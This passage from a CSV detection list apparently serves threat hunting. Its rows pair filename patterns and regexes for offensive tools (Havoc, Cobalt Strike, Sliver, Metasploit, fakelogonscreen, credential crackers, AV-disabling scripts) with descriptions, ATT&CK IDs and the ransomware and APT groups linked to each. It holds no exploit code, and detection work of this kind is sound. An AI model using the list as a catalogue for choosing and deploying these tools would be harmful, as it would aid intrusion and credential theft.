"*bin/addusertogroup.x64*",".{0,1000}bin\/addusertogroup\.x64.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","35922" "*bin/bof_c.o*",".{0,1000}bin\/bof_c\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira 
- APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","N/A","10","10","84","13","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z","35923" "*bin/bof_nim.o*",".{0,1000}bin\/bof_nim\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","N/A","10","10","84","13","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z","35924" "*bin/dll/merlin.c*",".{0,1000}bin\/dll\/merlin\.c.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform 
post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","35925" "*bin/GoAWSConsoleSpray*",".{0,1000}bin\/GoAWSConsoleSpray.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","0","N/A","N/A","9","1","29","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z","35926" "*bin/icmpsh/*",".{0,1000}bin\/icmpsh\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","35927" "*bin/iodine*",".{0,1000}bin\/iodine.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","35928" "*bin/LastenPIC.bin*",".{0,1000}bin\/LastenPIC\.bin.{0,1000}","offensive_tool_keyword","Lastenzug","Socka4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","0","#content","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","35929" "*bin/ldd2pretty*",".{0,1000}bin\/ldd2pretty.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","EMBER BEAR","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","10","1242","201","2025-04-06T13:31:57Z","2016-05-24T18:46:56Z","35930" "*bin/ligolo*",".{0,1000}bin\/ligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","35931" "*bin/localrelay*",".{0,1000}bin\/localrelay.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","35932" 
"*bin/masscan*",".{0,1000}bin\/masscan.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","#linux","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","35934" "*bin/merlinAgent*",".{0,1000}bin\/merlinAgent.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","35935" "*bin/PELoader.exe*",".{0,1000}bin\/PELoader\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","1","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","35936" "*bin/setoolkit*",".{0,1000}bin\/setoolkit.{0,1000}","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. 
SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/trustedsec/social-engineer-toolkit","1","1","N/A","N/A","N/A","10","11798","2922","2024-10-21T15:46:18Z","2012-12-31T22:01:33Z","35937" "*bin/setuserpass.x64*",".{0,1000}bin\/setuserpass\.x64.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","35938" "*bin/SillyRAT/*",".{0,1000}bin\/SillyRAT\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","35939" "*bin/stardust.x64.bin*",".{0,1000}bin\/stardust\.x64\.bin.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","35940" "*bin/striker*",".{0,1000}bin\/striker.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - 
T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","35941" "*bin/tun2socks*",".{0,1000}bin\/tun2socks.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35943" "*bin/void.zip*",".{0,1000}bin\/void\.zip.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","35944" "*Bin\bin32\zlibwapi.dll*",".{0,1000}Bin\\bin32\\zlibwapi\.dll.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","35946" "*Bin\bin64\zlibwapi.dll*",".{0,1000}Bin\\bin64\\zlibwapi\.dll.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","35947" "*bin\psexec_command.x64.o*",".{0,1000}bin\\psexec_command\.x64\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense 
Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","35948" "*bin\SillyRAT*",".{0,1000}bin\\SillyRAT.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","35950" "*bin\void.zip*",".{0,1000}bin\\void\.zip.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","35951" "*bin2mac.py *.bin*",".{0,1000}bin2mac\.py\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","35954" "*Binary-Offensive/ProtectMyTooling*",".{0,1000}Binary\-Offensive\/ProtectMyTooling.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","35955" "*BinaryToVbaFunc(*",".{0,1000}BinaryToVbaFunc\(.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/trustedsec/The_Shelf","1","0","#content","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","35956" "*binderlabs/DirCreate2System*",".{0,1000}binderlabs\/DirCreate2System.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","35957" "*binderlabs/DirCreate2System*",".{0,1000}binderlabs\/DirCreate2System.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","35958" "*Binedx765ance Chaedx765in Waledx765let*",".{0,1000}Binedx765ance\sChaedx765in\sWaledx765let.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","35959" "*binwalk -e image.png*",".{0,1000}binwalk\s\-e\simage\.png.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black 
Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","35960" "*BishopFox/sliver*",".{0,1000}BishopFox\/sliver.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35961" "*bitb_server/phishing.ini*",".{0,1000}bitb_server\/phishing\.ini.{0,1000}","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","N/A","10","10","2823","474","2024-01-26T05:20:18Z","2022-03-15T16:51:39Z","35963" "*bitcoin2john.py*",".{0,1000}bitcoin2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","35964" "*Bitdefender-DisableAV-Remote.bat*",".{0,1000}Bitdefender\-DisableAV\-Remote\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","tool used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35965" 
"*Bitmap-Elevate*",".{0,1000}Bitmap\-Elevate.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-MS16135.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","35988" "*bitquark_top100k_sublist.txt*",".{0,1000}bitquark_top100k_sublist\.txt.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance 
tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","N/A","6","10","1355","197","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z","35989" "*bits_ntlm_token_impersonation.*",".{0,1000}bits_ntlm_token_impersonation\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","35990" "*bitsadmin/fakelogonscreen*",".{0,1000}bitsadmin\/fakelogonscreen.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential 
Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","35993" "*bitsadmin/nopowershell*",".{0,1000}bitsadmin\/nopowershell.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","35994" "*bitsadmin/revbshell*",".{0,1000}bitsadmin\/revbshell.{0,1000}","offensive_tool_keyword","revbshell","ReVBShell - Reverse VBS Shell","T1059.005 - T1573.001 - T1105","TA0011 - TA0010","N/A","N/A","C2","https://github.com/bitsadmin/revbshell","1","1","N/A","N/A","10","10","81","27","2019-10-08T12:00:05Z","2017-02-19T18:58:52Z","35995" "*BitsadminStager*",".{0,1000}BitsadminStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","35996" "*bitshares2john.py*",".{0,1000}bitshares2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","35997" "*bitwarden2john.py*",".{0,1000}bitwarden2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","35998" "*Biu-framework*",".{0,1000}Biu\-framework.{0,1000}","offensive_tool_keyword","Biu-framework","Biu-framework Security Scan Framework For Enterprise Intranet Based Services","T1590 - T1591 - T1592 - T1593 - T1595 - T1596 - T1599","TA0011","N/A","N/A","Framework","https://awesomeopensource.com/project/0xbug/Biu-framework","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","35999" 
"*bkerberos_ccache_use*",".{0,1000}bkerberos_ccache_use.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36002" "*bkerberos_ticket_purge*",".{0,1000}bkerberos_ticket_purge.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced 
